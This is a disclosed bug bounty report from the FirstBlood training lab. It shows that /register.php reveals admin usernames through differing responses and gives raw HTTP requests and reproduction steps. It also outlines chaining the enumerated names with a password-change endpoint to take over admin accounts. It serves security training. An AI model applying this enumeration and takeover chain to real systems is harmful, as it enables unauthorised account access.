FirstBlood-#886 — Drpanel admin username enumeration
This issue was discovered on FirstBlood v2
On 2021-10-30, 0x1452 Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hey!
Summary
I noticed that the endpoint POST /register.php returns a different response if username is set to an admin account's name.
Compare the following two responses:
Non-admin username
POST /register.php HTTP/1.1
Host: 46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Length: 50
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://46d069c58ee9-0x1452.a.firstbloodhackers.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=register&username=admin&inviteCode=whatever
Admin username (drAdmin)
POST /register.php HTTP/1.1
Host: 46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Length: 52
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://46d069c58ee9-0x1452.a.firstbloodhackers.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://46d069c58ee9-0x1452.a.firstbloodhackers.com/register.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=register&username=drAdmin&inviteCode=whatever
Steps to reproduce
- Navigate to
/register.php
- Try to register any username with any invite code
- Repeat until you find an admin -> e.g.
drAdmin
Impact
While the impact is pretty low on its own, this could be used in combination with the account takeover reported in report #519. By bruteforcing a list of usernames on the register endpoint, an attacker can find valid admin accounts, then change their passwords.
P4 Low
Endpoint: /register.php
Parameter: username
Payload: any string
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
Report Feedback
Creator & Administrator
Hi there, we don't have a unique bug for enumerating usernames on FirstBlood and i'm going to assign ID 27 for this as the description mentions about enumerating :) Nice work though!